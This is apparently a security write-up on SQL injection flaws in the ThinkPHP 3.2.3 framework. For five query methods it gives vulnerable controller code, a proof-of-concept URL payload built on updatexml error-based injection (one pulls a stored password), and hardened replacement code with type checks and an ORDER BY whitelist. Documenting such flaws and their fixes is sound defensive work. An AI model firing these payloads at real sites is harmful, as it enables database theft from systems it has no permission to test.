0x01 find()

Vulnerable code:

```php
public function index()
{
    $data = M('users')->find(I('GET.id'));
    var_dump($data);
}
```

PoC:

?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)#

0x02 select()

Vulnerable code:

```php
public function test()
{
    $id  = I('id');
    $res = M('user')->select($id);
}
```

PoC. There are many injectable positions; the three listed here are table, alias and where. For the rest, follow the individual parseXXX methods of parseSql yourself; by inspection all of them look usable, for example having, group and so on:

table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

0x03 delete()

Vulnerable code:

```php
public function test()
{
    $id  = I('id');
    $res = M('user')->delete($id);
}
```

PoC, same as above. Three rough examples are given here: table, alias and where. When using table or alias, where must additionally be non-empty:

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

0x04 where()

Vulnerable code 1:

```php
public function index()
{
    $User = D('Users');
    $map  = array('id' => $_GET['id']);
    $user = $User->where($map)->find();
}
```

PoC:

id[0]=exp&id[1]==1 and updatexml(1,concat(0x7e,user(),0x7e),1)

Vulnerable code 2:

```php
public function index()
{
    $User             = M("User");
    $user['id']       = I('id');
    $data['password'] = I('password');
    $value            = $User->where($user)->save($data);
    var_dump($value);
}
```

PoC:

?id[0]=bind&id[1]=0%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)&password=1

0x05 order()

Vulnerable code:

```php
public function index()
{
    $User     = M("User");
    $order_by = I('get.order');
    $q        = $User->where('id', '1')->order($order_by)->find();
    var_dump($q);
}
```

PoC:

?order[updatexml(1,concat(0x3a,user()),1)]
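All five cases share one root cause: a parameter the controller expects to be a scalar arrives from I() or $_GET as an array, and the ThinkPHP 3.2 model then treats that array either as query options (table, alias, where) or as an expression form (exp, bind), or splices it straight into ORDER BY. The following is an added example, not code from the original post or from ThinkPHP, showing hardened versions of the handlers above. It assumes a standard Home module controller; the requireIntId() helper, the action names update() and sorted(), and the column whitelist are hypothetical.

```php
<?php
namespace Home\Controller;

use Think\Controller;

// Hypothetical helper (added example): accept only a non-negative integer id.
// I()'s filter argument is applied element-wise to arrays, so it does not
// collapse an array into a scalar; an explicit is_array() check is needed.
function requireIntId($value)
{
    if (is_array($value) || !ctype_digit((string)$value)) {
        // I() returns '' when the parameter is missing; that is rejected too
        send_http_status(400);
        exit('invalid id');
    }
    return (int)$value;
}

class IndexController extends Controller
{
    // 0x01 find(): pass an integer primary key, never the raw parameter,
    // so find() can no longer receive an options array
    public function index()
    {
        $id   = requireIntId(I('GET.id'));
        $data = M('users')->find($id);
        var_dump($data);
    }

    // 0x02 / 0x03 select() and delete(): same rule, and express the condition
    // with the typed array('eq', value) form so the operator is fixed by the code
    public function test()
    {
        $id  = requireIntId(I('id'));
        $res = M('user')->where(array('id' => array('eq', $id)))->select();
        // for deletion: M('user')->where(array('id' => array('eq', $id)))->delete();
    }

    // 0x04 where(): the exp/bind forms are only reachable when the value in
    // $map is itself an array, so cast before the value reaches where()
    public function update()
    {
        $User = M('User');
        $map  = array('id' => requireIntId(I('id')));
        // password is data, bound by the model, but an array must still be rejected
        $password = I('password');
        if (is_array($password)) {
            send_http_status(400);
            exit('invalid password');
        }
        $value = $User->where($map)->save(array('password' => $password));
        var_dump($value);
    }

    // 0x05 order(): ORDER BY is SQL structure, not data, so only a value from
    // a fixed whitelist of column names plus a fixed direction may be used
    public function sorted()
    {
        $allowed   = array('id', 'username', 'create_time'); // hypothetical columns
        $field     = I('get.order_field', 'id');
        $direction = strtoupper((string)I('get.order_dir', 'ASC')) === 'DESC' ? 'DESC' : 'ASC';
        if (!is_string($field) || !in_array($field, $allowed, true)) {
            $field = 'id';
        }
        $q = M('User')->where(array('id' => 1))->order($field . ' ' . $direction)->find();
        var_dump($q);
    }
}
```

The design choice is the same in every action: decide in the controller what type each parameter must have, reject anything else before it reaches the model, and never let request data choose which clause of the query it lands in.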

0x06 References

Summary of ThinkPHP 3.2.3 injection vulnerabilities

Analysis of SQL injection vulnerabilities in the ThinkPHP 3.2 framework (2018-08-23)

Update injection vulnerability in the latest ThinkPHP 3.2.3